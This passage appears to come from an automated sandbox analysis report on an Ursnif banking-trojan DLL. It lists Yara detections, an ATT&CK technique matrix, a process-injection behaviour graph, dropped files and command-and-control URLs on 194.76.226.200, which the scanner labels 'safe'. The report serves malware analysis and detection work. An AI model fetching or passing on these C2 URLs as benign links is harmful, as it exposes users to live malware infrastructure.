            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C15F8B cpuid 1_2_01C15F8B
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CDB44 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,1_2_046CDB44
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C130FD GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,1_2_01C130FD
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C13807 GetVersion,GetLastError,1_2_01C13807
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01C15F8B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_01C15F8B

            Stealing of Sensitive Information

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Ursnif
            Source: Yara matchFile source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Valid Accounts            		2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Obfuscated Files or Information            		1
            Input Capture            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default Accounts3
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            DLL Side-Loading            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Email Collection            		Exfiltration Over Bluetooth2
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)1
            Access Token Manipulation            		1
            File Deletion            		Security Account Manager3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Input Capture            		Automated Exfiltration1
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)813
            Process Injection            		1
            Masquerading            		NTDS25
            System Information Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer11
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Valid Accounts            		LSA Secrets11
            Security Software Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Access Token Manipulation            		Cached Domain Credentials31
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items31
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job813
            Process Injection            		Proc Filesystem1
            Application Window Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Regsvr32            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
            Rundll32            		Network Sniffing1
            Remote System Discovery            		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 560270 Sample: 61f113091fd0c.dll Startdate: 26/01/2022 Architecture: WINDOWS Score: 100 98 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->98 100 Yara detected  Ursnif 2->100 102 Machine Learning detection for sample 2->102 104 6 other signatures 2->104 9 loaddll32.exe 1 2->9         started        12 mshta.exe 19 2->12         started        14 mshta.exe 2->14         started        16 2 other processes 2->16 process3 signatures4 134 Writes to foreign memory regions 9->134 136 Allocates memory in foreign processes 9->136 138 Modifies the context of a thread in another process (thread injection) 9->138 140 3 other signatures 9->140 18 regsvr32.exe 9->18         started        22 control.exe 9->22         started        24 cmd.exe 1 9->24         started        26 rundll32.exe 1 9->26         started        28 powershell.exe 12->28         started        30 powershell.exe 14->30         started        32 powershell.exe 16->32         started        34 powershell.exe 16->34         started        process5 dnsIp6 94 192.168.2.1 unknown unknown 18->94 106 Writes to foreign memory regions 18->106 108 Allocates memory in foreign processes 18->108 110 Modifies the context of a thread in another process (thread injection) 18->110 122 2 other signatures 18->122 36 control.exe 18->36         started        112 Changes memory attributes in foreign processes to executable or writable 22->112 114 Injects code into the Windows Explorer (explorer.exe) 22->114 116 Maps a DLL or memory area into another process 22->116 39 rundll32.exe 24->39         started        118 System process connects to network (likely due to code injection or exploit) 26->118 42 control.exe 26->42         started        120 Creates a thread in another existing process (thread injection) 28->120 49 3 other processes 28->49 44 csc.exe 30->44         started        51 2 other processes 30->51 47 csc.exe 32->47         started        53 2 other processes 32->53 55 3 other processes 34->55 signatures7 process8 dnsIp9 124 Changes memory attributes in foreign processes to executable or writable 36->124 126 Injects code into the Windows Explorer (explorer.exe) 36->126 128 Writes to foreign memory regions 36->128 132 4 other signatures 36->132 57 explorer.exe 36->57 injected 96 194.76.226.200, 49752, 49753, 49754 SERVINGADE Germany 39->96 130 Writes registry values via WMI 39->130 60 control.exe 39->60         started        62 rundll32.exe 42->62         started        78 C:\Users\user\AppData\Local\...\sjfy431f.dll, PE32 44->78 dropped 64 cvtres.exe 44->64         started        80 C:\Users\user\AppData\Local\...\oyq1c2cj.dll, PE32 47->80 dropped 66 cvtres.exe 47->66         started        82 C:\Users\user\AppData\Local\...\ugg3o5nf.dll, PE32 49->82 dropped 84 C:\Users\user\AppData\Local\...\pqvogmwc.dll, PE32 49->84 dropped 74 2 other processes 49->74 86 C:\Users\user\AppData\Local\...\0hsihch1.dll, PE32 51->86 dropped 68 cvtres.exe 51->68         started        88 C:\Users\user\AppData\Local\...\oeprcmty.dll, PE32 53->88 dropped 70 cvtres.exe 53->70         started        90 C:\Users\user\AppData\Local\...\tpt0a0ul.dll, PE32 55->90 dropped 92 C:\Users\user\AppData\Local\...\pwlcj2cu.dll, PE32 55->92 dropped 72 cvtres.exe 55->72         started        file10 signatures11 process12 signatures13 142 Changes memory attributes in foreign processes to executable or writable 57->142 144 Self deletion via cmd delete 57->144 146 Disables SPDY (HTTP compression, likely to perform web injects) 57->146 148 Creates a thread in another existing process (thread injection) 57->148 76 rundll32.exe 60->76         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            61f113091fd0c.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.rundll32.exe.3290000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            5.2.rundll32.exe.1050000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            1.2.loaddll32.exe.1c10000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            3.2.regsvr32.exe.31f0000.1.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk0%Avira URL Cloudsafe
            http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk0%Avira URL Cloudsafe
            http://curlmyip.net0%Avira URL Cloudsafe
            http://194.76.226.200/0%Avira URL Cloudsafe
            http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txt0%URL Reputationsafe
            http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd0%Avira URL Cloudsafe
            http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:0%Avira URL Cloudsafe
            http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk0%Avira URL Cloudsafe
            http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ0%Avira URL Cloudsafe
            http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
